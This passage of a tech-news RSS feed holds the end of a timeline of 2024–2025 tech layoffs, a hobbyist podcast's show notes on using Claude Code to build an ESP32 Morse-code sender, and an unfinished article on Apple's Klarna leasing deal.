<p class="wp-block-paragraph"><a href="https://www.networkworld.com/article/4008670/can-intel-cut-its-way-to-profit-with-factory-layoffs.html">Intel will lay off up to 20% of its manufacturing sector employees</a> starting in July,  according to media reports, as the company looks for options as it seeks a return to profitability. The cuts reportedly will be made around the world, but some of the layoffs will be closer to home, according to a report in The Oregonian citing an internal company memo from Intel manufacturing Vice President Naga Chandrasekaran.</p>



<h3 class="wp-block-heading">May 7, 2025: CrowdStrike to lay off 5% of staff</h3>



<p class="wp-block-paragraph"><a href="https://www.reuters.com/sustainability/crowdstrike-lay-off-5-staff-reaffirms-forecasts-2025-05-07/">CrowdStrike announced a plan to cut about 500 roles</a>, roughly 5% of its workforce, to streamline operations and reduce costs. The cybersecurity company will incur about $36 million to $53 million in charges related to the layoffs</p>



<h3 class="wp-block-heading">March 6, 2025: HPE cuts 2,500 jobs, remains committed to Juniper buy</h3>



<p class="wp-block-paragraph">CEO Antonio Neri told Wall Street analysts that <a href="https://www.networkworld.com/article/3840596/hpe-cuts-2500-workers-expects-juniper-buy-to-close-end-of-25-faces-tariff-issues.html">HPE would begin implementing a cost-cutting program involving layoffs </a>of about 2,500 employees over the next 18 months. HPE employs about 61,000 people worldwide.</p>



<h3 class="wp-block-heading">Feb. 27, 2025: Autodesk to lay off 9% of workforce</h3>



<p class="wp-block-paragraph">Software maker Autodesk is laying off 1,350 staff. With the rise of subscription and multi-year contracts billed annually, and self-service enablement, it finds it needs fewer sales staff, <a href="https://adsknews.autodesk.com/en/news/022725-employee-message/">CEO Andrew Anagnost said in a message to employees</a>. And with its cloud, platform, and AI products proving most profitable, it’s concentrating its staff and investments there. </p>



<h3 class="wp-block-heading">Feb. 27, 2025: HP to lay off 2,000 more</h3>



<p class="wp-block-paragraph">As part of an ongoing restructuring, HP plans to lay off up to another 2,000 workers. In recent weeks, the company has tried — unsuccessfully — to do away with telephone support staff by <a href="https://www.pcworld.com/article/2617767/hp-forced-callers-to-wait-15-minutes-before-connecting-to-support-staff.html">forcing callers to wait for at least 15 minutes</a> if they refuse to use self-service support resources online. The company swiftly backtracked, but wider job cuts are still on. </p>



<h3 class="wp-block-heading">Feb. 21, 2025: <a href="https://www.csoonline.com/article/3829710/firing-of-130-cisa-staff-worries-cybersecurity-industry.html">CISA lays off 130</a></h3>



<p class="wp-block-paragraph">Government employees get laid off too: In this case, 130 workers at the US Cybersecurity and Infrastructure Security Agency are being shown the door as a result of a DOGE decision. Cybersecurity experts are concerned that the cuts will harm the international collaborations that CISA has fostered, quite apart from their concerns about the security of the DOGE layoff process itself.</p>



<h3 class="wp-block-heading">Feb. 5, 2025: <a href="https://www.computerworld.com/article/3817887/workday-to-cut-1750-jobs-shift-focus-to-ai-and-global-expansion.html">Workday lays off 1,750</a></h3>



<p class="wp-block-paragraph">As it moves to invest more in AI and international growth, Workday is laying off 8.5% of its workforce and disposing of unused office space. Some analysts fear the cutbacks will affect the company’s customer service — unless AI can pick up the slack.</p>



<h3 class="wp-block-heading">Feb. 4, 2025: Salesforce lays off over 1,000</h3>



<p class="wp-block-paragraph">At the same time as it’s hiring sales staff for its new artificial intelligence products, Salesforce is laying off over 1,000 workers across the company, according to Bloomberg. As of June, 2024, the company had over 72,000 employees, according to its website. Salesforce did not comment on the report. In 2024 the company reportedly laid off around 1,000 staff too, in two waves: January and July.</p>



<h3 class="wp-block-heading">Jan. 14, 2025: Meta will lay off 5% of workforce</h3>



<p class="wp-block-paragraph">Mark Zuckerberg told Meta employees he intended to “move out the low performers faster” in an internal memo reported by Bloomberg. The memo announced that the company will lay off 5% of its staff, or around 3,600 staff, beginning Feb. 10. The company had already reduced its headcount by 5% in 2024 through natural attrition, the memo said. Among those leaving the company will be staff previously responsible for fact checking of posts on its social media platforms in the US, as the company begins relying on its users to police content.</p>



<h2 class="wp-block-heading">Tech layoffs in 2024</h2>



<ul class="wp-block-list">
<li>Equinix</li>



<li>AMD</li>



<li>Freshworks</li>



<li>Cisco</li>



<li>General Motors</li>



<li>Intel</li>



<li>OpenText</li>



<li>Microsoft</li>



<li>AWS</li>



<li>Dell</li>
</ul>



<h3 class="wp-block-heading">Nov. 26, 2024: <a href="https://www.networkworld.com/article/3613399/equinix-to-cut-3-of-staff-amidst-the-greatest-demand-for-data-center-infrastructure-ever.html">Equinix to cut 3% of staff</a></h3>



<p class="wp-block-paragraph">Despite intense demand for its data center capacity, Equinix is planning to lay off 3% of its workforce, or around 400 employees. The announcement followed the appointment of Adaire Fox-Martin to replace Charles Meyers as CEO and the departures of two other senior executives, CIO Milind Wagle and CISO Michael Montoya.</p>



<h3 class="wp-block-heading">Nov. 13, 2024: <a href="https://www.networkworld.com/article/3605016/amd-to-cut-4-of-workforce-to-prioritize-ai-chip-expansion-to-rival-nvidia.html#:~:text=Workforce%20reduction%20comes%20amid%20strong,shift%20in%20focus%20toward%20AI.&amp;text=Advanced%20Micro%20Devices%20(AMD)%20is,Nvidia's%20lead%20in%20the%20sector.">AMD to cut 4% of workforce</a></h3>



<p class="wp-block-paragraph">AMD will lay off around 1,000 employees as it pivots towards developing AI-focused chips, it said. The move came as a surprise to staff, as the company also reported strong quarterly earnings. </p>



<h3 class="wp-block-heading">Nov. 7, 2024: <a href="https://www.cio.com/article/3601088/freshworks-lays-off-660-about-13-percent-of-its-global-workforce-despite-strong-earnings-profits.html">Freshworks lays off 660</a></h3>



<p class="wp-block-paragraph">Enterprise software vendor Freshworks laid off around 660 staff, or around 13% of its headcount, despite reporting increased revenue and profits in its fourth fiscal quarter. The company described the layoffs as a realignment of its global workforce.</p>



<h3 class="wp-block-heading">Sept. 17, 2024: <a href="https://www.networkworld.com/article/3486901/cisco-to-cut-7-of-workforce-restructure-product-groups.html">Cisco lays off 6,000</a></h3>



<p class="wp-block-paragraph">After laying off around 4,200 staff in February, Cisco is at it again, laying off another 6,000 or around 7% of its workforce. Among the divisions affected were its threat intelligence unit, Talos Security. </p>



<h3 class="wp-block-heading">Aug. 20, 2024: <a href="https://www.cio.com/article/3489323/gm-software-layoffs-could-signal-a-shift-in-digital-transformation-strategy.html">General Motors lays off 1,000 software staff</a></h3>



<p class="wp-block-paragraph">More than 1,000 software and services staff are on the way out at General Motors, signalling that it could be rethinking its digital transformation strategy. In an internal memo, the company said that it was moving resources to its highest-priority work and flattening hierarchies.</p>



<h3 class="wp-block-heading">August 1, 2024: <a href="https://www.computerworld.com/article/3480715/intel-fires-15000-employees-as-it-intensifies-focus-on-ai.html">Intel removes 15,000 roles</a></h3>



<p class="wp-block-paragraph">Intel plans to cut its workforce by around 15% to reduce costs after a disastrous second quarter. Revenue for the three months to June 29 stagnated at around $12.8 billion, but net income fell 85% to $83 million, prompting CEO Pat Gelsinger to bring forward a company-wide meeting in order to announce that 15,000 staff would lose their jobs. “This is an incredibly hard day for Intel as we are making some of the most consequential changes in our company’s history,” Gelsinger wrote in an email to staff, continuing: “Our revenues have not grown as expected — and we’ve yet to fully benefit from powerful trends, like AI. Our costs are too high, our margins are too low. We need bolder actions to address both — particularly given our financial results and outlook for the second half of 2024, which is tougher than previously expected.”</p>



<h3 class="wp-block-heading">July 4, 2024: <a href="https://www.computerworld.es/article/2513686/opentext-despedira-a-cerca-de-1-200-empleados.html">OpenText to lay off 1,200</a></h3>



<p class="wp-block-paragraph">OpenText said it will lay off 1,200 staff, or about 1.7% of its workforce, in a bid to save around $100 million annually. It plans to hire new sales and engineering staff in other areas in 2025, it said.</p>



<h3 class="wp-block-heading">June 4, 2024: <a href="https://www.networkworld.com/article/2138075/microsoft-lays-off-staffers-from-its-azure-division.html">Microsoft lays off staff in Azure division</a></h3>



<p class="wp-block-paragraph">Microsoft laid off staff in several teams supporting its cloud services, including Azure for Operations and Mission Engineering. The company didn’t say exactly how many staff were leaving.</p>



<h3 class="wp-block-heading">April 4, 2024: <a href="https://www.cio.com/article/2081437/amazon-downsizes-aws-in-a-fresh-cost-cutting-round.html">Amazon downsizes AWS</a> in a fresh cost-cutting round</h3>



<p class="wp-block-paragraph">Amazon announced hundreds of layoffs in the sales and marketing teams of its AWS cloud services division — and also in the technology development teams for its physical retail stores, as it stepped back from efforts to generalize the “<a href="https://www.cio.com/article/2079910/amazon-drops-just-walk-out-technology-at-its-us-retail-locations.html">Just Walk Out</a>” technology built for its Amazon Fresh grocery stores. </p>



<h3 class="wp-block-heading">April 1, 2024: <a href="https://investors.delltechnologies.com/static-files/d6e82f58-d417-422f-b2f3-4d08d498abd4" target="_blank" rel="noreferrer noopener">Dell acknowledges 13,000 job cuts</a></h3>



<p class="wp-block-paragraph">Dell Technologies’ <a href="https://investors.delltechnologies.com/static-files/d6e82f58-d417-422f-b2f3-4d08d498abd4" target="_blank" rel="noreferrer noopener">latest 10K filing with the US Securities and Exchange Commission</a> disclosed that the company had laid off 13,000 employees over the course of the 2023 fiscal year; it characterized the layoffs and other reorganizational moves as cost-cutting measures. “These actions resulted in a reduction in our overall headcount,” the company said. A comparison to the previous year’s 10K filing, performed by The Register, found that Dell employed 133,000 people at that point, compared to 120,000 as of February 2024. Dell announced layoffs of 6,650 staffers on Feb. 6, but it is unclear whether those cuts were reflected in the numbers from this year’s 10K statement.</p>



<p class="wp-block-paragraph"><em><a href="https://www.computerworld.com/article/3816662/tech-layoffs-in-2024-a-timeline.html">See news of earlier layoffs.</a></em></p>



<p class="wp-block-paragraph"></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[HPR4689: Cheap Yellow Display Project Part 8: Writing the code]]></title>
<description><![CDATA[This show has been flagged as Clean by the host.



Hello, again. This is Trey.










Welcome to part 8 in my Cheap Yellow Display (CYD) Project series.  










If you wish to catch up on earlier episodes, you can find them on my 

HPR profile page



https://www.hackerp...]]></description>
<link>https://tsecurity.de/de/3687798/podcasts/hpr4689-cheap-yellow-display-project-part-8-writing-the-code/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687798/podcasts/hpr4689-cheap-yellow-display-project-part-8-writing-the-code/</guid>
<pubDate>Thu, 23 Jul 2026 02:06:01 +0200</pubDate>
<category>🎥 Podcasts</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>This show has been flagged as Clean by the host.</p>

<p>

Hello, again. This is Trey.

</p>

<p>


</p>

<p>

Welcome to part 8 in my Cheap Yellow Display (CYD) Project series.  

</p>

<p>


</p>

<p>

If you wish to catch up on earlier episodes, you can find them on my 
<a href="https://www.hackerpublicradio.org/correspondents/0394.html" rel="noopener noreferrer" target="_blank">
HPR profile page</a>


<a href="https://www.hackerpublicradio.org/correspondents/0394.html" rel="noopener noreferrer" target="_blank">
https://www.hackerpublicradio.org/correspondents/0394.html</a>



</p>

<p>


</p>

<p>

It is hard to believe that I started this project and the HPR series to document it more than a year ago.  Time flies.  Life happens. I spent the last 8 months so focused on work related activities that I had to set the project aside.  And once I set it aside, it was difficult to get back to again.  The one time I tried, I found that my son's old Windows laptop, which I had commandeered to use for the project, was once and truly dead.  

</p>

<p>


</p>

<p>

We live in a different world now than we did when I began this project.  Today, everything is about AI – how it is changing our world, increasing efficiencies, and even displacing certain types of jobs.  "Vibe coding" is transforming the way we make software, and now everyone is a developer.

</p>

<p>


</p>

<p>

Within my organization, we are all being strongly encouraged to learn more about AI and apply it in our daily work.  We are blessed to have access to a wide range of training and to powerful tools which support the process.  Several colleagues within my organization and outside my organization have recommended Claude Code -- for development, for organization, for brainstorming, and for much more.  My role is not that of a developer, and I have had no need for Claude Code at work.  There are plenty of other tools for me to use.

</p>

<p>


</p>

<p>

But at home, I thought... I could install Claude Code at home to experiment with and to learn.  And then it hit me.  I wonder if I could use Claude Code to help me with my stalled CYD project.  

</p>

<p>


</p>

<p>

"Hello, my name is Trey, and I am a fraud."

</p>

<p>


</p>

<p>

OK.  I don't think I am a fraud, but having never used such a powerful tool to help me code, I feel a little bit like a fraud, with Claude doing the work for me. Let's talk through what we did.

</p>

<p>


</p>

<p>

As I mentioned, I was unable to use the laptop on which I created the original GUI code.  But no worries, because It was all on GitHub, right?

</p>

<p>


</p>

<p>

So, I began by trying to install Claude Code on one of my Ubuntu machines.  That failed miserably, and all the instructions I found online recommended running it on Windows.  So I transitioned to installing Claude Code on a freshly built Windows 10 system using some old hardware which will not support Windows 11.  Surprisingly, It seems that Claude wants to run within Ubuntu on Windows Subsystem for Linux (WSL).

</p>

<p>


</p>

<p>

Once I went through all the hoops for installing and setting up my basic subscription, I got to work.  I created a new directory to use for all my project files, and another one for Claude to write all its output files to.

</p>

<p>


</p>

<p>

Everything I have read and heard about using Claude Code for a project like this recommended beginning by using Claude to create the project plan.  So my first prompt was as follows:

</p>

<p>


</p>

<p>

"I am building a project using an ESP32 cheap yellow display. The final goal is to have a device with a graphical user interface which will allow me store several text messages, each assigned to their own specific button. Then, when one of the buttons is pressed, the message will be converted into morse code, and the message will be sent by blinking an onboard LED. I already have the initial design for the GUI coded in my github repository. Please construct a detailed step by step plan for building this application"

</p>

<p>


</p>

<p>

I wanted to keep it simple at the beginning, so even though I plan to use an opto-isolated relay for the output, I am starting out using the built in LED.

</p>

<p>


</p>

<p>

Claude asked me for the URL for my Github repository, and I provided it.  After thinking for a bit, it produced a project plan.

</p>

<p>


</p>

<p>

CYD Morse Sender — Step-by-Step Build Plan

</p>

<p>


</p>

<p>

What You Already Have

</p>

<p>

- 3 fully designed LVGL screens (Send, Config, Keyboard)

</p>

<p>

- 7 send buttons with green styling on the Send Screen

</p>

<p>

- Speed slider (5–30 WPM) and program slot dropdown on Config Screen

</p>

<p>

- Text area + LVGL keyboard widget on Keyboard Screen

</p>

<p>

- Display driver and touchscreen hardware initialized (but touch read was stubbed out)

</p>

<p>

---

</p>

<p>

Phase 1: Fix Touchscreen Input

</p>

<p>

Initialize the XPT2046 on VSPI, replace the hardcoded touched = false with real touch data, calibrate raw ADC coordinates to screen pixels, and verify all three nav buttons transition screens correctly.                         

</p>

<p>


</p>

<p>

Phase 2: Persistent Message Storage

</p>

<p>

Use Preferences.h / NVS to store 7 messages ("msg0" – "msg6") that survive power cycles. Load on boot and populate send button labels.

</p>

<p>


</p>

<p>

Phase 3: Config Screen — Slot Selection &amp; Speed

</p>

<p>

Wire the Program dropdown to g_selectedSlot, wire the Speed slider to g_wpm with a live WPM label, and wire the Set button to clear the text area and navigate to the Keyboard Screen.

</p>

<p>


</p>

<p>

Phase 4: Keyboard Screen — Capture and Save Text

</p>

<p>

On keyboard OK (LV_EVENT_READY): read the text area, save to NVS, update the send button label, navigate back. On Cancel: navigate back without saving.

</p>

<p>


</p>

<p>

Phase 5: Morse Code Engine

</p>

<p>

Build morse.h with the full A–Z / 0–9 lookup table, a textToMorse() converter, and Paris-standard timing (unit_ms = 1200 / wpm).

</p>

<p>


</p>

<p>

Phase 6: Non-Blocking LED Transmission

</p>

<p>

State machine (IDLE / LED_ON / LED_OFF) driven by millis() in a morseUpdate() function called every loop — no delay().   LED on GPIO 17 (blue).

</p>

<p>


</p>

<p>

Phase 7: Wire the Send Buttons

</p>

<p>

Each button calls startMorse(getMessage(slot)) if not already transmitting. Disable all send buttons during TX; re-enable when the state machine reaches the end.

</p>

<p>


</p>

<p>

Phase 8: Integration &amp; Polish

</p>

<p>

Stop button, WPM persistence, empty-slot guard, serial debug output, final touch calibration, end-to-end test checklist.

</p>

<p>

---

</p>

<p>

Recommended order: Phase 1 → 2 → 7 (partial) → 5 → 6 → 7 (full) → 3 → 4 → 8

</p>

<p>


</p>

<p>


</p>

<p>

This was wild!  Claude determined exactly how far along I was in the project, and also alerted me to the fact that the "touch read was stubbed out".  Ugh.  This means that the files I had uploaded to GitHub were my original GUI files (Episode 05 – HPR4532 - 
<a href="https://hackerpublicradio.org/eps/hpr4532/index.html" rel="noopener noreferrer" target="_blank">
https://hackerpublicradio.org/eps/hpr4532/index.html</a>

) and not the ones that I finally got working properly (Episode 07 – HPR4624 - 
<a href="https://hackerpublicradio.org/eps/hpr4624/index.html" rel="noopener noreferrer" target="_blank">
https://hackerpublicradio.org/eps/hpr4624/index.html</a>

).  That was my own fault.  Did I mention that I don't get Git?  I REALLY need to learn to properly use Git!

</p>

<p>


</p>

<p>

But, we have a plan, broken down by eight numbered phases.  And they seem to address all the functionality I wanted with a few additional things I had not thought about.  Interestingly, even though these phases are sequentially numbered, Claud recommended that we approach them in a bizarre order: Phase 1 → 2 → 7 (partial) → 5 → 6 → 7 (full) → 3 → 4 → 8 .

</p>

<p>


</p>

<p>

Alright.  Let's see what we can do.  The first phase is to fix the touchscreen input.  

</p>

<p>


</p>

<p>

Claude took me through it step-by-step, asking as it needed to read specific project files.

</p>

<p>


</p>

<p>

Finally, it wrote a new ui.ino code file to my speficied output directory for me to test.  I copied it into the correct file location, said a quick prayer, compiled in Arduino IDE, and downloaded to the CYD.

</p>

<p>


</p>

<p>

Well, that is... interesting.  The display looked nothing like it was supposed to.  There were vertical green bars with smaller dashed green vertical stripes in them. I will include a picture in the show notes so that you can see what it looked like and why it was so difficult to describe.  

</p>

<p>


</p>

<p>

<a href="https://hackerpublicradio.org/eps/hpr4689/hpr4689_image_1.jpeg">
<img src="https://hackerpublicradio.org/eps/hpr4689/hpr4689_image_1_tn.jpeg">
</a>

</p>

<p>


</p>

<p>

I spent the next hour or so trying to explain what I was seeing to a chat bot.  Claude recommended potential fixes which either did nothing or made the situation worse.  I began questioning whether this was a good idea, how people actually gained efficiencies talking to a bot, and even several life choices.  

</p>

<p>


</p>

<p>

Then I had a thought.  I prompted Claude:

</p>

<p>


</p>

<p>

If I were to take a picture of the screen on the cheap yellow display and copy it into the output folder, would you be able to analyze it to better determine what is wrong and how to fix it?

</p>

<p>


</p>

<p>

Shockingly, Claude answered in the affirmative, and told me to copy the picture to the output folder and let it know when to proceed.  It analyzed the picture and more of the supporting files it had copied from my GitHub, asking each time if it could access that file.  It determined that my original code was written for a flavor of LVGL version 8 and I was now using LVGL 9.5.  

</p>

<p>


</p>

<p>

It recommended changes, and then asked permission to make those changes, file by file.  .h files &amp; .c files,  Finally, I just gave it permission to edit the files in the project folder without asking for permission for each file each time.  Claude was still explaining each change, showing me exactly what would be changed, and asking for permission, so that I could review all of the changes.  But now it was not asking additional permission to write to each of the impacted files.

</p>

<p>


</p>

<p>

Next, Code compiled and downloaded.  Different screen, but not right. Again, I took a picture and gave it to Claude to analyze.  So, Claude paused and altered the code to generate a specific test pattern overtop of the GUI.

</p>

<p>


</p>

<p>

</p>

<p>

<a href="https://hackerpublicradio.org/eps/hpr4689/hpr4689_image_2.jpeg">
<img src="https://hackerpublicradio.org/eps/hpr4689/hpr4689_image_2_tn.jpeg">
</a>

</p>

<p>


</p>

<p>

The test pattern was supposed to cover the entire rectangular screen.  But parts of the pattern were in a square on the screen and parts were not.  Another photograph and analysis, told Claude that there were some rotation/screensize issues.

</p>

<p>


</p>

<p>

We repeated this several times.  Some resulted in improvement, and others did not.

</p>

<p>


</p>

<p>

This is the point where I noticed something interesting. Not about Claude, specifically, or about the app.  But I noticed something interesting about myself and about the process.

</p>

<p>


</p>

<p>

Previously, when I was working through some of these challenges without Claud, I found myself becoming more and more stressed, frustrated, and angry, until I found a solution.  Then another problem would repeat the cycle.  Success in the end was great, but the emotional extremes during the process were not always pleasant.  

</p>

<p>


</p>

<p>

Now, I was effectively managing the project, and relaying information to the resource responsible for fixing the problems -- a very different experience.

</p>

<p>


</p>

<p>

But I also ran into another issue.  Claude became absolutely certain that the problem revolved around the device not accurately knowing where the 4 corners of the screen were.  But in reality, the output of the test pattern was rotated 90 degrees from the actual screen.  It took several iterations of me insisting that the problem had to do with screen orientation and not corner coordinates.  It was interesting to experience the tool doubling down on an obvious mistake, but we finally resolved that.

</p>

<p>


</p>

<p>

Again, while it was frustrating, it was much less stressful.

</p>

<p>


</p>

<p>


</p>

<p>

We proceeded to 
<strong>

<em>
Phase 2: Persistent Message Storage</em>

</strong>

where we ensured that the button labels on the send screen were stored in the devices persistent storage, so that, when they are edited to contain the message they should send, that information would survive a reboot.

</p>

<p>


</p>

<p>

Next, we combined elements of 
<strong>

<em>
Phase 5: Morse Code Engine</em>

</strong>

, 
<strong>

<em>
Phase 6: Non-Blocking LED Transmission</em>

</strong>

, and 
<strong>

<em>
Phase 7: Wire the Send Buttons</em>

</strong>

together. Building the morse code engine was an area I had been thinking about for a while.  I already had working parts of something similar in the Arduino practice oscillator I have referenced a few times in this series.  The code for the practice oscillator may be found on my GitHub, but it was all based on original code from jmharvey1, with my only contribution being making pin assignments variables so that the code could easily be ported to different devices.  

</p>

<p>


</p>

<p>

So, I was happy that we were building the morse code engine directly.  The code for it may be found in morse.h, which uses a constant character lookup table to define each character.  Without any specific direction from me, Claude used the PARIS timing methods I have already described within Episode 6 of this series.  It defines timing for DOT, DASH, LETTER_GAP, and WORD_GAP, and all are based on a simple calculation of 1200 ms / the number of words per minute (WPM) we wish to transmit.

</p>

<p>


</p>

<p>

Along the way, we discovered that, if we tried to use the delay() function, it would crash the program due to a conflict with the LVGL timer used for touchscreen inputs. Claude altered all the delays accordingly.

</p>

<p>


</p>

<p>

Then, 
<strong>

<em>
Phase 3: Config Screen — Slot Selection &amp; Speed</em>

</strong>

allowed us to configure the WPM we wished to use in addition to selecting a specific Send button to reconfigure.  This forced us to work on 
<strong>

<em>
Phase 4: Keyboard Screen — Capture and Save Text</em>

</strong>

which is used to type the entries for each Send button.  At this point, I also decided that we would want to also use the Keyboard Screen to send ad hoc morse as we typed it.

</p>

<p>


</p>

<p>

During this phase we discovered several bugs which seemed to cause random freezes.  Careful troubleshooting with messages output to the Arduino IDE's serial console helped us narrow down the causes and remedy them.

</p>

<p>


</p>

<p>

Finally all the tests worked and I am able to merrily pre-configure macro buttons with custom messages and use the CYD to send the morse code for those messages to the on-board LED at whichever rate I specify.

</p>

<p>


</p>

<p>

I have noticed in my presentation of this narrative that I repeatedly slip into the first person plural terms "we" and "us" instead of the first person singular terms "I" and "me".  I have unconsciously personified Claud and recognized it as an integral part of my (formerly one person) development team.

</p>

<p>


</p>

<p>

I finally configured Claude to connect to my GitHub repo and upload all the files and documentation. We additionally created a CYD-Narrative.md file which describes in more detail all the work which was done on the project.  I still do not 100% get git, but we are successfully using it.

</p>

<p>


</p>

<p>

You can find all these files in my GitHub repo (
<a href="https://github.com/jttrey3/CYD_MorseSender" rel="noopener noreferrer" target="_blank">
https://github.com/jttrey3/CYD_MorseSender</a>

) where they are shared under a GPL 3.0 license.

</p>

<p>


</p>

<p>

There are still several additional steps I plan to complete in the next few months.  

</p>

<p>


</p>

<p>

1. I will be integrating an opto-isolated relay which will allow me to plug the device into the straight key input on any amateur radio.  This will require a battery power source, charge controller, and more hardware.

</p>

<ol>

<li>

I... make that "We" (Claude &amp; I)  will be modifying the code to support an audio side tone through an attached speaker when sending code

</li>

<li>

We will add an output selection switch to the config page to choose any combination of speaker, relay, or LED as output.

</li>

<li>

We will develop a downloadable firmware which I hope to share with the Cheap Yellow Display community.

</li>

</ol>

<p>


</p>

<p>

If you can think of any additional features you would like to see integrated, please drop me an email using the address in my HPR profile.

</p>

<p>


</p>

<p>

I may also work with a friend to attempt to 3d print a case for the entire contraption, and I will be sure to record additional episodes sharing the process.

</p>

<p>


</p>

<p>

I have learned so much throughout this project, about the CYD, ESP32, GUIs, Claude Code, GitHub, and most of all, about myself.  

</p>

<p>


</p>

<p>

Does using AI to develop this code make me a fraud? It still feels like it in some ways.  

</p>

<p>


</p>

<p>

Does it make me more productive?  ABSOLUTELY!  I made consistent forward progress when I only had 30-60 minutes each day to work on it, and everything discussed in this episode was completed in less than a week.  If I had been able to work on it for a few hours uninterrupted, it may have only taken me 3-5 hours.

</p>

<p>


</p>

<p>

Does it empower and inspire me to do more projects like this?  100%  I feel like I had support working with me the whole way.  I was less stressed overall, and it had less of an impact on the amount of and quality of time I spent with my family.

</p>

<p>


</p>

<p>

I will be wrapping up this series soon, without any more 6 month gaps, I hope.

</p>

<p>


</p>

<p>

Until next time...

</p>

<p>

</p>


<p><a href="https://hackerpublicradio.org/eps/hpr4689/index.html#comments">Provide <strong>feedback</strong> on this episode</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Own nothing, upgrade everything: Apple’s new Klarna deal]]></title>
<description><![CDATA[Just in time for the iPhone’s 20th anniversary, Apple is moving closer to becoming a service company. It is set to launch its new deal with Klarna next week and when it does, Apple enthusiasts in the US will effectively be able to subscribe to their favorite Apple hardware, with the cost spread a...]]></description>
<link>https://tsecurity.de/de/3687133/it-nachrichten/own-nothing-upgrade-everything-apples-new-klarna-deal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687133/it-nachrichten/own-nothing-upgrade-everything-apples-new-klarna-deal/</guid>
<pubDate>Wed, 22 Jul 2026 19:18:48 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Just in time for the iPhone’s 20th anniversary, Apple is moving closer to becoming a service company. It is set to <a href="https://www.reuters.com/business/apple-launch-upgrade-device-leasing-program-spur-sales-bloomberg-news-reports-2026-07-21/" target="_blank" rel="noreferrer noopener">launch its new deal</a> with Klarna next week and when it does, Apple enthusiasts in the US will effectively be able to subscribe to their favorite Apple hardware, with the cost spread across up to three years.</p>



<p class="wp-block-paragraph">This matters because when combined with Apple One and Apple’s Creator Studio subscriptions, the Klarna arrangement brings Apple closer to offering a full subscription model for hardware, software, and services. The only thing you don’t get under the new arrangement is AppleCare, for which you’ll allegedly need to pay extra.</p>



<h2 class="wp-block-heading"><strong>Moving closer to hardware-as-a-service</strong></h2>



<p class="wp-block-paragraph">Apple has slowly been <a href="https://www.applemust.com/opinion-how-you-will-access-apple-products-in-future/#google_vignette" target="_blank" rel="noreferrer noopener">transitioning toward</a> hardware-as-a-service for almost a decade. Back then, Forrester analyst <a href="https://www.applemust.com/apple-klarna-mean-we-can-now-get-apple-as-a-service/" target="_blank" rel="noreferrer noopener">Frank Gillet predicted</a> the company would eventually offer bundles of services and products for a monthly, all-in, fee. </p>



<p class="wp-block-paragraph">This isn’t quite where we are yet; you still need at least three subscriptions to get close. But, after the better part of a decade, Apple has moved much nearer to the hardware-as-a-service idea.</p>



<p class="wp-block-paragraph">There are some products reportedly excluded from the arrangement, including MacBook Neo, Apple Watch SE, the entry-level iPad, and iPhone 16. Clearly, Apple sees those products as sufficiently affordable. </p>



<h2 class="wp-block-heading"><strong>Easy payments for RAM-ageddon</strong></h2>



<p class="wp-block-paragraph">The new Klarna arrangement comes as Apple is forced to increase product prices as AI-driven memory price inflation becomes widely felt across every economy. In theory, I assume, Apple hopes to make its products available to cash-strapped consumers who need new hardware, while also navigating a time of deep economic tumult and uncertainty. It’s thought the company has <a href="https://www.bloomberg.com/news/newsletters/2025-04-06/will-apple-raise-iphone-prices-in-the-us-after-trump-tariffs-iphone-17-details" target="_blank" rel="noreferrer noopener">previously rejected these plans</a> to protect normal hardware sales, but normality is a kingdom we no longer seem to possess. Interesting times. Probable inflation incoming.</p>



<p class="wp-block-paragraph">“Apple Upgrade lands at precisely the moment Apple needs it,” IDC analyst Francisco Jeronimo wrote in a note seen by <em>Computerworld</em>. “Having just pushed Mac and iPad prices up on the back of the memory shortage, with iPhone increases widely expected in September — as well as the new iPhone foldable expected at $2,500 — Apple’s real risk is that rising prices even further can impact the upgrade cycle.” </p>



<h2 class="wp-block-heading"><strong>New age, new shopping habits</strong></h2>



<p class="wp-block-paragraph">The introduction of the scheme gives consumers a way to purchase the company’s popular high-end devices when they are introduced — no doubt,at higher cost — this fall. Plus, of course, if it’s <a href="https://www.businessinsider.com/general-motors-gm-earnings-subscriptions-revenue-business-2026-1" target="_blank" rel="noreferrer noopener">good enough for GM</a>, it’s good enough for Apple.</p>



<p class="wp-block-paragraph">It’s all about attitude, too. From Apple’s perspective, it <a href="https://www.computerworld.com/article/4125784/are-you-ready-for-apple-as-a-service.html">has done plenty of the groundwork</a> required to <a href="https://www.applemust.com/apple-vp-eddy-cue-shares-15-important-apple-services-stats/" target="_blank" rel="noreferrer noopener">convince its customers</a> that subscription payments for things you value are no bad thing. </p>



<p class="wp-block-paragraph">Reluctance to embrace “Access Not Ownership’”purchasing models has dropped dramatically since Apple — and <a href="https://www.computerworld.com/article/1665439/apples-tim-cook-has-kept-his-50b-services-promises.html">CEO Tim Cook</a> — first began <a href="https://www.applemust.com/apples-50b-services-target-just-isnt-ambitious-enough/">banging the drum</a> for services income. Apple’s services stream has now become its second-biggest revenue driver after the iPhone. It has over 1 billion paid subscriptions, and an active hardware installed base of <a href="https://www.computerworld.com/article/4168225/wwdc-2026-how-apple-can-take-a-great-leap-in-ai.html">more than 2.5 billion devices globally</a>.</p>



<p class="wp-block-paragraph">A combination of changed customer habits and external threat means the stars are now aligned for hardware-as-a-service models. “Reframing a device as a low monthly payment protects that [upgrade] cadence and allows Apple to start marketing their products as device-as-a-service to consumers, which no other vendor was ever able to do,” Jeronimo wrote to me. </p>



<p class="wp-block-paragraph">There is a one-more-thing aspect to this: the products are effectively being leased, a new approach that will give Apple a stronger grip on EOL devices, helping it grab more of them for refurbishment, resale, and recycling. Over time, this will give the company a much stronger grip on the lucrative second-user market that exists around Apple equipment, even while for almost every consumer product we find the life we want is something we can rent, but <a href="https://medium.com/from-heart-to-hand/the-subscription-society-what-happens-when-you-own-nothing-ef32d5bc32d2" target="_blank" rel="noreferrer noopener">probably can’t afford to own</a>.</p>



<h2 class="wp-block-heading"><strong>Managing future risk</strong></h2>



